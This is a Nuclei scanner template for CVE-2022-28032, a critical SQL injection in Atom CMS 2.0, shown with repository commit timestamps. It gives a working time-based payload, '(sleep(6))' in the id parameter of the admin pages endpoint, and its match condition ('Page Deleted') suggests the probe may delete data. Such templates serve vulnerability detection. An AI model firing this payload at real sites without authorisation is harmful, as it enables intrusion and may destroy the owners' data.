nuclei-templates/http/cves/2022/CVE-2022-28032.yaml

44 lines
1.4 KiB
YAML
Raw Normal View History

2023-04-21 08:56:01 +00:00
id: CVE-2022-28032
info:
name: Atom CMS v2.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
AtomCMS 2.0 is vulnerable to SQL Injection via Atom.CMS_admin_ajax_pages.php
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
2023-09-06 11:59:08 +00:00
remediation: Fixed in version Atom CMS v2.1
2023-04-21 08:56:01 +00:00
reference:
- https://github.com/thedigicraft/Atom.CMS/issues/263
- https://nvd.nist.gov/vuln/detail/CVE-2022-28032
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-28032
cwe-id: CWE-89
epss-score: 0.02852
epss-percentile: 0.89667
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
2023-04-21 08:56:01 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: thedigitalcraft
product: atomcms
2023-12-05 09:50:33 +00:00
tags: cve,cve2022,sqli,atom,cms,thedigitalcraft
2023-04-21 08:56:01 +00:00
http:
2023-04-21 08:56:01 +00:00
- raw:
- |
@timeout: 20s
GET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "Page Deleted")'
condition: and
# digest: 490a0046304402206fbcdb570ce64bd8487b63bc4373ae692d676b7158f6dd43afe9649788188210022033f8e4cb27b162e18f65bbca85a8cda4bdc7d5d2f021e200c684de61aa466368:922c64590222798bb761d5b6d8e72950